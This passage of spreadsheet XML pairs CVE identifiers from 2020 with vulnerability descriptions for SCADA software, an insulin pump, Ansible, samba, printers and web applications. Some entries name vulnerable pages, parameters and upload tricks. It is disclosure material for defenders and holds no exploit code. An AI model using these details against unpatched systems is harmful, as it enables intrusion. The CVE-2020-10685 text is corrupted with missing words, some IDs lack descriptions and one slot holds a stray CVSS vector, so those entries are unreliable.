    <t>An issue was discovered in drf-jwt 1.15.x before 1.15.1. It allows attackers with access to a notionally invalidated token to obtain a new, working token via the refresh endpoint, because the blacklist protection mechanism is incompatible with the token-refresh feature. NOTE: drf-jwt is a fork of jpadilla/django-rest-framework-jwt, which is unmaintained.</t>
  </si>
  <si>
    <t>CVE-2020-10595</t>
  </si>
  <si>
    <t>pam-krb5 before 4.9 has a buffer overflow that might cause remote code execution in situations involving supplemental prompting by a Kerberos library. It may overflow a buffer provided by the underlying Kerberos library by a single '\0' byte if an attacker responds to a prompt with an answer of a carefully chosen length. The effect may range from heap corruption to stack corruption depending on the structure of the underlying Kerberos library, with unknown effects but possibly including code execution. This code path is not used for normal authentication, but only when the Kerberos library does supplemental prompting, such as with PKINIT or when using the non-standard no_prompt PAM configuration option.</t>
  </si>
  <si>
    <t>CVE-2020-10596</t>
  </si>
  <si>
    <t>OpenCart 3.0.3.2 allows remote authenticated users to conduct XSS attacks via a crafted filename in the users' image upload section.</t>
  </si>
  <si>
    <t>CVE-2020-10597</t>
  </si>
  <si>
    <t>Delta Industrial Automation DOPSoft, Version 4.00.08.15 and prior. Multiple out-of-bounds read vulnerabilities may be exploited by processing specially crafted project files, which may allow an attacker to read information and/or crash the application.</t>
  </si>
  <si>
    <t>CVE-2020-10598</t>
  </si>
  <si>
    <t>In BD Pyxis MedStation ES System v1.6.1 and Pyxis Anesthesia (PAS) ES System v1.6.1, a restricted desktop environment escape vulnerability exists in the kiosk mode functionality of affected devices. Specially crafted inputs could allow the user to escape the restricted environment, resulting in access to sensitive data.</t>
  </si>
  <si>
    <t>CVE-2020-10599</t>
  </si>
  <si>
    <t>VISAM VBASE Editor version 11.5.0.2 and VBASE Web-Remote Module may allow a vulnerable ActiveX component to be exploited resulting in a buffer overflow, which may lead to a denial-of-service condition and execution of arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-1060</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1035, CVE-2020-1058, CVE-2020-1093.</t>
  </si>
  <si>
    <t>CVE-2020-10600</t>
  </si>
  <si>
    <t>An authenticated remote attacker could crash PI Archive Subsystem when the subsystem is working under memory pressure. This can result in blocking queries to PI Data Archive (2018 SP2 and prior versions).</t>
  </si>
  <si>
    <t>CVE-2020-10601</t>
  </si>
  <si>
    <t>VISAM VBASE Editor version 11.5.0.2 and VBASE Web-Remote Module allow weak hashing algorithm and insecure permissions which may allow a local attacker to bypass the password-protected mechanism through brute-force attacks, cracking techniques, or overwriting the password hash.</t>
  </si>
  <si>
    <t>CVE-2020-10602</t>
  </si>
  <si>
    <t>In OSIsoft PI System multiple products and versions, an authenticated remote attacker could crash PI Network Manager due to a race condition. This can result in blocking connections and queries to PI Data Archive.</t>
  </si>
  <si>
    <t>CVE-2020-10603</t>
  </si>
  <si>
    <t>WebAccess/NMS (versions prior to 3.0.2) does not properly sanitize user input and may allow an attacker to inject system commands remotely.</t>
  </si>
  <si>
    <t>CVE-2020-10604</t>
  </si>
  <si>
    <t>In OSIsoft PI System multiple products and versions, a remote, unauthenticated attacker could crash PI Network Manager service through specially crafted requests. This can result in blocking connections and queries to PI Data Archive.</t>
  </si>
  <si>
    <t>CVE-2020-10605</t>
  </si>
  <si>
    <t>Grundfos CIM 500 before v06.16.00 responds to unauthenticated requests for password storage files.</t>
  </si>
  <si>
    <t>CVE-2020-10606</t>
  </si>
  <si>
    <t>In OSIsoft PI System multiple products and versions, a local attacker can exploit incorrect permissions set by affected PI System software. This exploitation can result in unauthorized information disclosure, deletion, or modification if the local computer also processes PI System data from other users, such as from a shared workstation or terminal server deployment.</t>
  </si>
  <si>
    <t>CVE-2020-10607</t>
  </si>
  <si>
    <t>In Advantech WebAccess, Versions 8.4.2 and prior. A stack-based buffer overflow vulnerability caused by a lack of proper validation of the length of user-supplied data may allow remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-10608</t>
  </si>
  <si>
    <t>In OSIsoft PI System multiple products and versions, a local attacker can plant a binary and bypass a code integrity check for loading PI System libraries. This exploitation can target another local user of PI System software on the computer to escalate privilege and result in unauthorized information disclosure, deletion, or modification.</t>
  </si>
  <si>
    <t>CVE-2020-10609</t>
  </si>
  <si>
    <t>Grundfos CIM 500 v06.16.00 stores plaintext credentials, which may allow sensitive information to be read or allow modification to system settings by someone with access to the device.</t>
  </si>
  <si>
    <t>CVE-2020-1061</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the Microsoft Script Runtime handles objects in memory, aka 'Microsoft Script Runtime Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-10610</t>
  </si>
  <si>
    <t>In OSIsoft PI System multiple products and versions, a local attacker can modify a search path and plant a binary to exploit the affected PI System software to take control of the local computer at Windows system privilege level, resulting in unauthorized information disclosure, deletion, or modification.</t>
  </si>
  <si>
    <t>CVE-2020-10611</t>
  </si>
  <si>
    <t>Triangle MicroWorks SCADA Data Gateway 3.02.0697 through 4.0.122, 2.41.0213 through 4.0.122 allows remote attackers to execute arbitrary code due to the lack of proper validation of user-supplied data, which can result in a type confusion condition. Authentication is not required to exploit this vulnerability. Only applicable to installations using DNP3 Data Sets.</t>
  </si>
  <si>
    <t>CVE-2020-10612</t>
  </si>
  <si>
    <t>Opto 22 SoftPAC Project Version 9.6 and prior. SoftPACAgent communicates with SoftPACMonitor over network Port 22000. However, this port is open without any restrictions. This allows an attacker with network access to control the SoftPACAgent service including updating SoftPAC firmware, starting or stopping service, or writing to certain registry values.</t>
  </si>
  <si>
    <t>CVE-2020-10613</t>
  </si>
  <si>
    <t>Triangle MicroWorks SCADA Data Gateway 3.02.0697 through 4.0.122, 2.41.0213 through 4.0.122 allows remote attackers to disclose sensitive information due to the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated structure. Authentication is not required to exploit this vulnerability. Only applicable to installations using DNP3 Data Sets.</t>
  </si>
  <si>
    <t>CVE-2020-10614</t>
  </si>
  <si>
    <t>In OSIsoft PI System multiple products and versions, an authenticated remote attacker with write access to PI Vision databases could inject code into a display. Unauthorized information disclosure, deletion, or modification is possible if a victim views the infected display.</t>
  </si>
  <si>
    <t>CVE-2020-10615</t>
  </si>
  <si>
    <t>Triangle MicroWorks SCADA Data Gateway 3.02.0697 through 4.0.122, 2.41.0213 through 4.0.122 allows remote attackers cause a denial-of-service condition due to a lack of proper validation of the length of user-supplied data, prior to copying it to a fixed-length stack-based buffer. Authentication is not required to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-10616</t>
  </si>
  <si>
    <t>Opto 22 SoftPAC Project Version 9.6 and prior. SoftPAC does not specify the path of multiple imported .dll files. Therefore, an attacker can replace them and execute code whenever the service starts.</t>
  </si>
  <si>
    <t>CVE-2020-10617</t>
  </si>
  <si>
    <t>There are multiple ways an unauthenticated attacker could perform SQL injection on WebAccess/NMS (versions prior to 3.0.2) to gain access to sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-10618</t>
  </si>
  <si>
    <t>LCDS LAquis SCADA Versions 4.3.1 and prior. The affected product is vulnerable to sensitive information exposure by unauthorized users.</t>
  </si>
  <si>
    <t>CVE-2020-10619</t>
  </si>
  <si>
    <t>An attacker could use a specially crafted URL to delete files outside the WebAccess/NMS's (versions prior to 3.0.2) control.</t>
  </si>
  <si>
    <t>CVE-2020-1062</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory, aka 'Internet Explorer Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1092.</t>
  </si>
  <si>
    <t>CVE-2020-10620</t>
  </si>
  <si>
    <t>Opto 22 SoftPAC Project Version 9.6 and prior. SoftPAC communication does not include any credentials. This allows an attacker with network access to directly communicate with SoftPAC, including, for example, stopping the service remotely.</t>
  </si>
  <si>
    <t>CVE-2020-10621</t>
  </si>
  <si>
    <t>Multiple issues exist that allow files to be uploaded and executed on the WebAccess/NMS (versions prior to 3.0.2).</t>
  </si>
  <si>
    <t>CVE-2020-10622</t>
  </si>
  <si>
    <t>LCDS LAquis SCADA Versions 4.3.1 and prior. The affected product is vulnerable to arbitrary file creation by unauthorized users</t>
  </si>
  <si>
    <t>CVE-2020-10623</t>
  </si>
  <si>
    <t>Multiple vulnerabilities could allow an attacker with low privileges to perform SQL injection on WebAccess/NMS (versions prior to 3.0.2) to gain access to sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-10624</t>
  </si>
  <si>
    <t>ControlEdge PLC (R130.2, R140, R150, and R151) and RTU (R101, R110, R140, R150, and R151) exposes a session token on the network.</t>
  </si>
  <si>
    <t>CVE-2020-10625</t>
  </si>
  <si>
    <t>WebAccess/NMS (versions prior to 3.0.2) allows an unauthenticated remote user to create a new admin account.</t>
  </si>
  <si>
    <t>CVE-2020-10626</t>
  </si>
  <si>
    <t>In Fazecast jSerialComm, Version 2.2.2 and prior, an uncontrolled search path element vulnerability could allow a malicious DLL file with the same name of any resident DLLs inside the software installation to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-10627</t>
  </si>
  <si>
    <t>Insulet Omnipod Insulin Management System insulin pump product ID 19191 and 40160 is designed to communicate using a wireless RF with an Insulet manufactured Personal Diabetes Manager device. This wireless RF communication protocol does not properly implement authentication or authorization. An attacker with access to one of the affected insulin pump models may be able to modify and/or intercept data. This vulnerability could also allow attackers to change pump settings and control insulin delivery.</t>
  </si>
  <si>
    <t>CVE-2020-10628</t>
  </si>
  <si>
    <t>ControlEdge PLC (R130.2, R140, R150, and R151) and RTU (R101, R110, R140, R150, and R151) exposes unencrypted passwords on the network.</t>
  </si>
  <si>
    <t>CVE-2020-10629</t>
  </si>
  <si>
    <t>WebAccess/NMS (versions prior to 3.0.2) does not sanitize XML input. Specially crafted XML input could allow an attacker to read sensitive files.</t>
  </si>
  <si>
    <t>CVE-2020-1063</t>
  </si>
  <si>
    <t>CVE-2020-10630</t>
  </si>
  <si>
    <t>SAE IT-systems FW-50 Remote Telemetry Unit (RTU). The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in the output used as a webpage that is served to other users.</t>
  </si>
  <si>
    <t>CVE-2020-10631</t>
  </si>
  <si>
    <t>An attacker could use a specially crafted URL to delete or read files outside the WebAccess/NMS's (versions prior to 3.0.2) control.</t>
  </si>
  <si>
    <t>CVE-2020-10632</t>
  </si>
  <si>
    <t>Inadequate folder security permissions in Emerson OpenEnterprise versions through 3.3.4 may allow modification of important configuration files, which could cause the system to fail or behave in an unpredictable manner.</t>
  </si>
  <si>
    <t>CVE-2020-10633</t>
  </si>
  <si>
    <t>A non-persistent XSS (cross-site scripting) vulnerability exists in eWON Flexy and Cosy (all firmware versions prior to 14.1s0). An attacker could send a specially crafted URL to initiate a password change for the device. The target must introduce the credentials to the gateway before the attack can be successful.</t>
  </si>
  <si>
    <t>CVE-2020-10634</t>
  </si>
  <si>
    <t>SAE IT-systems FW-50 Remote Telemetry Unit (RTU). A specially crafted request could allow an attacker to view the file structure of the affected device and access files that should be inaccessible.</t>
  </si>
  <si>
    <t>CVE-2020-10635</t>
  </si>
  <si>
    <t>Simulation models for KUKA.Sim Pro version 3.1 are hosted by a server maintained by KUKA. When these devices request a model, the server transmits the model in plaintext.</t>
  </si>
  <si>
    <t>CVE-2020-10636</t>
  </si>
  <si>
    <t>Inadequate encryption may allow the passwords for Emerson OpenEnterprise versions through 3.3.4 user accounts to be obtained.</t>
  </si>
  <si>
    <t>CVE-2020-10637</t>
  </si>
  <si>
    <t>Eaton HMiSoft VU3 (HMIVU3 runtime not impacted), Version 3.00.23 and prior, however, the HMIVU runtimes are not impacted by these issues. A specially crafted input file could trigger an out-of-bounds read when loaded by the affected product.</t>
  </si>
  <si>
    <t>CVE-2020-10638</t>
  </si>
  <si>
    <t>Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple heap-based buffer overflow vulnerabilities exist caused by a lack of proper validation of the length of user-supplied data, which may allow remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-10639</t>
  </si>
  <si>
    <t>Eaton HMiSoft VU3 (HMIVU3 runtime not impacted), Version 3.00.23 and prior, however, the HMIVU runtimes are not impacted by these issues. A specially crafted input file could cause a buffer overflow when loaded by the affected product.</t>
  </si>
  <si>
    <t>CVE-2020-1064</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input.An attacker could execute arbitrary code in the context of the current user, aka 'MSHTML Engine Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-10640</t>
  </si>
  <si>
    <t>Emerson OpenEnterprise versions through 3.3.4 may allow an attacker to run an arbitrary commands with system privileges or perform remote code execution via a specific communication service.</t>
  </si>
  <si>
    <t>CVE-2020-10641</t>
  </si>
  <si>
    <t>An unprotected logging route may allow an attacker to write endless log statements into the database without space limits or authentication. This results in consuming the entire available hard-disk space on the Ignition 8 Gateway (versions prior to 8.0.10), causing a denial-of-service condition.</t>
  </si>
  <si>
    <t>CVE-2020-10642</t>
  </si>
  <si>
    <t>In Rockwell Automation RSLinx Classic versions 4.11.00 and prior, an authenticated local attacker could modify a registry key, which could lead to the execution of malicious code using system privileges when opening RSLinx Classic.</t>
  </si>
  <si>
    <t>CVE-2020-10643</t>
  </si>
  <si>
    <t>An authenticated remote attacker could use specially crafted URLs to send a victim using PI Vision 2019 mobile to a vulnerable web page due to a known issue in a third-party component.</t>
  </si>
  <si>
    <t>CVE-2020-10644</t>
  </si>
  <si>
    <t>The affected product lacks proper validation of user-supplied data, which can result in deserialization of untrusted data on the Ignition 8 Gateway (versions prior to 8.0.10) and Ignition 7 Gateway (versions prior to 7.9.14), allowing an attacker to obtain sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-10646</t>
  </si>
  <si>
    <t>Fuji Electric V-Server Lite all versions prior to 4.0.9.0 contains a heap based buffer overflow. The buffer allocated to read data, when parsing VPR files, is too small.</t>
  </si>
  <si>
    <t>CVE-2020-10648</t>
  </si>
  <si>
    <t>Das U-Boot through 2020.01 allows attackers to bypass verified boot restrictions and subsequently boot arbitrary images by providing a crafted FIT image to a system configured to boot the default configuration.</t>
  </si>
  <si>
    <t>CVE-2020-10649</t>
  </si>
  <si>
    <t>DevActSvc.exe in ASUS Device Activation before 1.0.7.0 for Windows 10 notebooks and PCs could lead to unsigned code execution with no additional restrictions when a user puts an application at a particular path with a particular file name.</t>
  </si>
  <si>
    <t>CVE-2020-1065</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-10654</t>
  </si>
  <si>
    <t>Ping Identity PingID SSH before 4.0.14 contains a heap buffer overflow in PingID-enrolled servers. This condition can be potentially exploited into a Remote Code Execution vector on the authenticating endpoint.</t>
  </si>
  <si>
    <t>CVE-2020-10655</t>
  </si>
  <si>
    <t>The Proofpoint Insider Threat Management Server (formerly ObserveIT Server) before 7.9.1 contains a vulnerability in the ITM application server's WriteWindowMouse API. The vulnerability allows an anonymous remote attacker to execute arbitrary code with local administrator privileges. The vulnerability is caused by improper deserialization.</t>
  </si>
  <si>
    <t>CVE-2020-10656</t>
  </si>
  <si>
    <t>The Proofpoint Insider Threat Management Server (formerly ObserveIT Server) before 7.9.1 contains a vulnerability in the ITM application server's WriteWindowMouseWithChunksV2 API. The vulnerability allows an anonymous remote attacker to execute arbitrary code with local administrator privileges. The vulnerability is caused by improper deserialization.</t>
  </si>
  <si>
    <t>CVE-2020-10657</t>
  </si>
  <si>
    <t>The Proofpoint Insider Threat Management Server (formerly ObserveIT Server) before 7.9.1 contains a vulnerability in the ITM web console's ImportAlertRules feature. The vulnerability allows a remote attacker (with admin or config-admin privileges in the console) to execute arbitrary code with local administrator privileges. The vulnerability is caused by improper deserialization.</t>
  </si>
  <si>
    <t>CVE-2020-10658</t>
  </si>
  <si>
    <t>The Proofpoint Insider Threat Management Server (formerly ObserveIT Server) before 7.9.1 contains a vulnerability in the ITM application server's WriteImage API. The vulnerability allows an anonymous remote attacker to execute arbitrary code with local administrator privileges. The vulnerability is caused by improper deserialization.</t>
  </si>
  <si>
    <t>CVE-2020-10659</t>
  </si>
  <si>
    <t>Entrust Entelligence Security Provider (ESP) before 10.0.60 on Windows mishandles errors during SSL Certificate Validation, leading to situations where (for example) a user continues to interact with a web site that has an invalid certificate chain.</t>
  </si>
  <si>
    <t>CVE-2020-1066</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level.To exploit the vulnerability, an attacker would first have to access the local machine, and then run a malicious program.The update addresses the vulnerability by correcting how .NET Framework activates COM objects., aka '.NET Framework Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-10660</t>
  </si>
  <si>
    <t>HashiCorp Vault and Vault Enterprise versions 0.9.0 through 1.3.3 may, under certain circumstances, have an Entity's Group membership inadvertently include Groups the Entity no longer has permissions to. Fixed in 1.3.4.</t>
  </si>
  <si>
    <t>CVE-2020-10661</t>
  </si>
  <si>
    <t>HashiCorp Vault and Vault Enterprise versions 0.11.0 through 1.3.3 may, under certain circumstances, have existing nested-path policies grant access to Namespaces created after-the-fact. Fixed in 1.3.4.</t>
  </si>
  <si>
    <t>CVE-2020-10663</t>
  </si>
  <si>
    <t>The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.4 through 2.4.9, 2.5 through 2.5.7, and 2.6 through 2.6.5, has an Unsafe Object Creation Vulnerability. This is quite similar to CVE-2013-0269, but does not rely on poor garbage-collection behavior within Ruby. Specifically, use of JSON parsing methods can lead to creation of a malicious object within the interpreter, with adverse effects that are application-dependent.</t>
  </si>
  <si>
    <t>CVE-2020-10664</t>
  </si>
  <si>
    <t>The IGMP component in VxWorks 6.8.3 IPNET CVE patches created in 2019 has a NULL Pointer Dereference.</t>
  </si>
  <si>
    <t>CVE-2020-10665</t>
  </si>
  <si>
    <t>Docker Desktop allows local privilege escalation to NT AUTHORITY\SYSTEM because it mishandles the collection of diagnostics with Administrator privileges, leading to arbitrary DACL permissions overwrites and arbitrary file writes. This affects Docker Desktop Enterprise before 2.1.0.9, Docker Desktop for Windows Stable before 2.2.0.4, and Docker Desktop for Windows Edge before 2.2.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-10666</t>
  </si>
  <si>
    <t>The restapps (aka Rest Phone apps) module for Sangoma FreePBX and PBXact 13, 14, and 15 through 15.0.19.2 allows remote code execution via a URL variable to an AMI command.</t>
  </si>
  <si>
    <t>CVE-2020-10667</t>
  </si>
  <si>
    <t>The web application exposed by the Canon Oce Colorwave 500 4.0.0.0 printer is vulnerable to Stored XSS in /TemplateManager/indexExternalLocation.jsp. The vulnerable parameter is map(template_name). NOTE: this is fixed in the latest version.</t>
  </si>
  <si>
    <t>CVE-2020-10668</t>
  </si>
  <si>
    <t>The web application exposed by the Canon Oce Colorwave 500 4.0.0.0 printer is vulnerable to Reflected XSS in /home.jsp. The vulnerable parameter is openSI. NOTE: this is fixed in the latest version.</t>
  </si>
  <si>
    <t>CVE-2020-10669</t>
  </si>
  <si>
    <t>The web application exposed by the Canon Oce Colorwave 500 4.0.0.0 printer is vulnerable to authentication bypass on the page /home.jsp. An unauthenticated attacker able to connect to the device's web interface can get a copy of the documents uploaded by any users. NOTE: this is fixed in the latest version.</t>
  </si>
  <si>
    <t>CVE-2020-1067</t>
  </si>
  <si>
    <t>CVE-2020-10670</t>
  </si>
  <si>
    <t>The web application exposed by the Canon Oce Colorwave 500 4.0.0.0 printer is vulnerable to Reflected XSS in the parameter settingId of the settingDialogContent.jsp page. NOTE: this is fixed in the latest version.</t>
  </si>
  <si>
    <t>CVE-2020-10671</t>
  </si>
  <si>
    <t>The Canon Oce Colorwave 500 4.0.0.0 printer's web application is missing any form of CSRF protections. This is a system-wide issue. An attacker could perform administrative actions by targeting a logged-in administrative user. NOTE: this is fixed in the latest version.</t>
  </si>
  <si>
    <t>CVE-2020-10672</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms).</t>
  </si>
  <si>
    <t>CVE-2020-10673</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus).</t>
  </si>
  <si>
    <t>CVE-2020-10674</t>
  </si>
  <si>
    <t>PerlSpeak through 2.01 allows attackers to execute arbitrary OS commands, as demonstrated by use of system and 2-argument open.</t>
  </si>
  <si>
    <t>CVE-2020-10675</t>
  </si>
  <si>
    <t>The Library API in buger jsonparser through 2019-12-04 allows attackers to cause a denial of service (infinite loop) via a Delete call.</t>
  </si>
  <si>
    <t>CVE-2020-10678</t>
  </si>
  <si>
    <t>In Octopus Deploy before 2020.1.5, for customers running on-premises Active Directory linked to their Octopus server, an authenticated user can leverage a bug to escalate privileges.</t>
  </si>
  <si>
    <t>CVE-2020-1068</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows Media Service that allows file creation in arbitrary locations.To exploit the vulnerability, an attacker would first have to log on to the system, aka 'Microsoft Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1010, CVE-2020-1079.</t>
  </si>
  <si>
    <t>CVE-2020-10681</t>
  </si>
  <si>
    <t>The Filemanager in CMS Made Simple 2.2.13 has stored XSS via a .pxd file, as demonstrated by m1_files[] to admin/moduleinterface.php.</t>
  </si>
  <si>
    <t>CVE-2020-10682</t>
  </si>
  <si>
    <t>The Filemanager in CMS Made Simple 2.2.13 allows remote code execution via a .php.jpegd JPEG file, as demonstrated by m1_files[] to admin/moduleinterface.php. The file should be sent as application/octet-stream and contain PHP code (it need not be a valid JPEG file).</t>
  </si>
  <si>
    <t>CVE-2020-10683</t>
  </si>
  <si>
    <t>dom4j before 2.0.3 and 2.1.x before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j.</t>
  </si>
  <si>
    <t>CVE-2020-10684</t>
  </si>
  <si>
    <t>A flaw was found in Ansible Engine, all versions 2.7.x, 2.8.x and 2.9.x prior to 2.7.17, 2.8.9 and 2.9.6 respectively, when using ansible_facts as a subkey of itself and promoting it to a variable when inject is enabled, overwriting the ansible_facts after the clean. An attacker could take advantage of this by altering the ansible_facts, such as ansible_hosts, users and any other key data which would lead into privilege escalation or code injection.</t>
  </si>
  <si>
    <t>CVE-2020-10685</t>
  </si>
  <si>
    <t>A flaw was found in Ansible Engine affecting Ansible Engine versions 2.7.x before 2.7.17 and 2.8.x before 2.8.11 and 2.9.x before 2.9.7 as well as Ansible Tower before and including versions 3.4.5 and 3.5.5 and 3.6.3 when using modules which decrypts vault files such as assemble, script, unarchive, win_copy, aws_s3 or copy modules. The temporary directory is created in /tmp leaves the s ts unencrypted. On Operating Systems which /tmp is not a tmpfs but part of the root partition, the directory is only cleared on boot and the decryp emains when the host is switched off. The system will be vulnerable when the system is not running. So decrypted data must be cleared as soon as possible and the data which normally is encrypted ble.</t>
  </si>
  <si>
    <t>CVE-2020-10686</t>
  </si>
  <si>
    <t>A flaw was found in Keycloak version 8.0.2 and 9.0.0, and was fixed in Keycloak version 9.0.1, where a malicious user registers as oneself. The attacker could then use the remove devices form to post different credential IDs and possibly remove MFA devices for other users.</t>
  </si>
  <si>
    <t>CVE-2020-10687</t>
  </si>
  <si>
    <t>A flaw was discovered in all versions of Undertow before Undertow 2.2.0.Final, where HTTP request smuggling related to CVE-2017-2666 is possible against HTTP/1.x and HTTP/2 due to permitting invalid characters in an HTTP request. This flaw allows an attacker to poison a web-cache, perform an XSS attack, or obtain sensitive information from request other than their own.</t>
  </si>
  <si>
    <t>CVE-2020-10688</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) flaw was found in RESTEasy in versions before 3.11.1.Final and before 4.5.3.Final, where it did not properly handle URL encoding when the RESTEASY003870 exception occurs. An attacker could use this flaw to launch a reflected XSS attack.</t>
  </si>
  <si>
    <t>CVE-2020-10689</t>
  </si>
  <si>
    <t>A flaw was found in the Eclipse Che up to version 7.8.x, where it did not properly restrict access to workspace pods. An authenticated user can exploit this flaw to bypass JWT proxy and gain access to the workspace pods of another user. Successful exploitation requires knowledge of the service name and namespace of the target pod.</t>
  </si>
  <si>
    <t>CVE-2020-1069</t>
  </si>
  <si>
    <t>CVE-2020-10690</t>
  </si>
  <si>
    <t>There is a use-after-free in kernel versions before 5.5 due to a race condition between the release of ptp_clock and cdev while resource deallocation. When a (high privileged) process allocates a ptp device file (like /dev/ptpX) and voluntarily goes to sleep. During this time if the underlying device is removed, it can cause an exploitable condition as the process wakes up to terminate and clean all attached files. The system crashes due to the cdev structure being invalid (as already freed) which is pointed to by the inode.</t>
  </si>
  <si>
    <t>CVE-2020-10691</t>
  </si>
  <si>
    <t>An archive traversal flaw was found in all ansible-engine versions 2.9.x prior to 2.9.7, when running ansible-galaxy collection install. When extracting a collection .tar.gz file, the directory is created without sanitizing the filename. An attacker could take advantage to overwrite any file within the system.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-10693</t>
  </si>
  <si>
    <t>A flaw was found in Hibernate Validator version 6.1.2.Final. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.</t>
  </si>
  <si>
    <t>CVE-2020-10695</t>
  </si>
  <si>
    <t>An insecure modification flaw in the /etc/passwd file was found in the redhat-sso-7 container. An attacker with access to the container can use this flaw to modify the /etc/passwd and escalate their privileges.</t>
  </si>
  <si>
    <t>CVE-2020-10696</t>
  </si>
  <si>
    <t>A path traversal flaw was found in Buildah in versions before 1.14.5. This flaw allows an attacker to trick a user into building a malicious container image hosted on an HTTP(s) server and then write files to the user's system anywhere that the user has permissions.</t>
  </si>
  <si>
    <t>CVE-2020-10697</t>
  </si>
  <si>
    <t>A flaw was found in Ansible Tower when running Openshift. Tower runs a memcached, which is accessed via TCP. An attacker can take advantage of writing a playbook polluting this cache, causing a denial of service attack. This attack would not completely stop the service, but in the worst-case scenario, it can reduce the Tower performance, for which memcached is designed. Theoretically, more sophisticated attacks can be performed by manipulating and crafting the cache, as Tower relies on memcached as a place to pull out setting values. Confidential and sensitive data stored in memcached should not be pulled, as this information is encrypted. This flaw affects Ansible Tower versions before 3.6.4, Ansible Tower versions before 3.5.6 and Ansible Tower versions before 3.4.6.</t>
  </si>
  <si>
    <t>CVE-2020-10698</t>
  </si>
  <si>
    <t>A flaw was found in Ansible Tower when running jobs. This flaw allows an attacker to access the stdout of the executed jobs which are run from other organizations. Some sensible data can be disclosed. However, critical data should not be disclosed, as it should be protected by the no_log flag when debugging is enabled. This flaw affects Ansible Tower versions before 3.6.4, Ansible Tower versions before 3.5.6 and Ansible Tower versions before 3.4.6.</t>
  </si>
  <si>
    <t>CVE-2020-10699</t>
  </si>
  <si>
    <t>A flaw was found in Linux, in targetcli-fb versions 2.1.50 and 2.1.51 where the socket used by targetclid was world-writable. If a system enables the targetclid socket, a local attacker can use this flaw to modify the iSCSI configuration and escalate their privileges to root.</t>
  </si>
  <si>
    <t>CVE-2020-1070</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system, aka 'Windows Print Spooler Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1048.</t>
  </si>
  <si>
    <t>CVE-2020-10700</t>
  </si>
  <si>
    <t>A use-after-free flaw was found in the way samba AD DC LDAP servers, handled 'Paged Results' control is combined with the 'ASQ' control. A malicious user in a samba AD could use this flaw to cause denial of service. This issue affects all samba versions before 4.10.15, before 4.11.8 and before 4.12.2.</t>
  </si>
  <si>
    <t>CVE-2020-10701</t>
  </si>
  <si>
    <t>A missing authorization flaw was found in the libvirt API responsible for changing the QEMU agent response timeout. This flaw allows read-only connections to adjust the time that libvirt waits for the QEMU guest agent to respond to agent commands. Depending on the timeout value that is set, this flaw can make guest agent commands fail because the agent cannot respond in time. Unprivileged users with a read-only connection could abuse this flaw to set the response timeout for all guest agent messages to zero, potentially leading to a denial of service. This flaw affects libvirt versions before 6.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-10702</t>
  </si>
  <si>
    <t>A flaw was found in QEMU in the implementation of the Pointer Authentication (PAuth) support for ARM introduced in version 4.0 and fixed in version 5.0.0. A general failure of the signature generation process caused every PAuth-enforced pointer to be signed with the same signature. A local attacker could obtain the signature of a protected pointer and abuse this flaw to bypass PAuth protection for all programs running on QEMU.</t>
  </si>
  <si>
    <t>CVE-2020-10703</t>
  </si>
  <si>
    <t>A NULL pointer dereference was found in the libvirt API responsible introduced in upstream version 3.10.0, and fixed in libvirt 6.0.0, for fetching a storage pool based on its target path. In more detail, this flaw affects storage pools created without a target path such as network-based pools like gluster and RBD. Unprivileged users with a read-only connection could abuse this flaw to crash the libvirt daemon, resulting in a potential denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-10704</t>
  </si>
  <si>
    <t>A flaw was found when using samba as an Active Directory Domain Controller. Due to the way samba handles certain requests as an Active Directory Domain Controller LDAP server, an unauthorized user can cause a stack overflow leading to a denial of service. The highest threat from this vulnerability is to system availability. This issue affects all samba versions before 4.10.15, before 4.11.8 and before 4.12.2.</t>
  </si>
